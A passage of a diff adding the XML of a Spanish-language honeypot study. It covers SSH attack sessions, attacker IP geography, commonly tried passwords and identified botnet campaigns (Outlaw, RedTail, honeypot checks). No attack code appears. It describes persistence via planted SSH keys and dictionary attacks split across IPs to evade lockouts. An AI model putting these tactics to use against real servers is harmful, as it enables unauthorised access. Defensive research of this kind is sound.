+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">1 192</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">8,7</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="3000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Entra y ejecuta comandos o sube ficheros</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">1 559</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">11,3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="3000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Entra y se desconecta sin hacer nada</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">501</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">3,6</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 13. Clasificación de las sesiones por comportamiento.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Las 501 sesiones que se desconectan tras entrar corresponden a la verificación de credenciales: el bot comprueba que la contraseña funciona y la registra para un uso posterior, posiblemente por otro actor.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Origen Geográfico</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La geolocalización asigna a cada IP el país de su proveedor, que no tiene por qué coincidir con el del atacante: las IPs observadas pertenecen mayoritariamente a servidores alquilados y a equipos ya comprometidos que forman parte de botnets. Con esa salvedad, la Figura 6 muestra dos patrones opuestos. Países Bajos concentra el 72,7 % de las conexiones con solo 44 IPs, mientras que Estados Unidos (98 IPs) y China (74 IPs) son los países con más atacantes distintos, cada uno con poca actividad.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura 6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conexiones por país del proveedor de la IP (diez primeros)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5038725" cy="2752725"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="8" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5038725" cy="2752725"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El caso de Países Bajos se explica por una única campaña: 15 IPs consecutivas del rango 109.160.32.0/24, de un mismo proveedor de hosting, generan el 61,9 % de todas las conexiones del periodo (8 517). Probaron 8 491 combinaciones de usuario y contraseña sin repetir ninguna, repartiendo un diccionario entre las 15 direcciones para no superar umbrales de bloqueo por IP. Solo consiguieron entrar 9 veces y nunca ejecutaron comandos: su función es recolectar credenciales válidas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Credenciales</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El usuario más probado es root (1 860 intentos), seguido de admin, user, ubuntu y cuentas de servicios habituales (postgres, oracle, hadoop). Las contraseñas confirman el uso de diccionarios de credenciales triviales: 123456, 1234, admin, password y la contraseña vacía (98 intentos). Destaca la cadena 345gs5662d34 y su variante 3245gs5662d34, usadas 758 veces desde 93 IPs distintas: no es una contraseña que se intente adivinar, sino un valor fijo característico de una familia concreta de bots.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura 7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Contraseñas más probadas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4572000" cy="3181350"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="9" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4572000" cy="3181350"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Campañas Identificadas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Los comandos y ficheros capturados permiten reconocer campañas documentadas públicamente. Los ficheros se identifican por su hash SHA-256, que es el indicador de compromiso que se compartiría con otros equipos de seguridad.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1349"/>
+        <w:gridCol w:w="3016"/>
+        <w:gridCol w:w="1349"/>
+        <w:gridCol w:w="2223"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Campaña</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Evidencia</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Alcance</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1400"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Objetivo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Botnet Outlaw (Dota)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Sustituye ~/.ssh por una clave propia con el comentario «mdrfckr» y la bloquea con chattr</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">396 sesiones, 97 IPs</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1400"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Persistencia: acceso permanente aunque se cambie la contraseña</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">RedTail</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Sube por SFTP setup.sh, clean.sh y el minero para cinco arquitecturas (x86_64, i686, ARMv7, ARMv8, RISC-V)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">1 IP</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1400"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Minería de criptomonedas con los recursos del servidor</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Comprobación de honeypot</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Script «filter» que analiza cómo responde la shell y recoge CPU, núcleos, GPU e historial de accesos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">203 sesiones, 12 IPs</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1400"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Decidir si la máquina es real y útil para minar</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
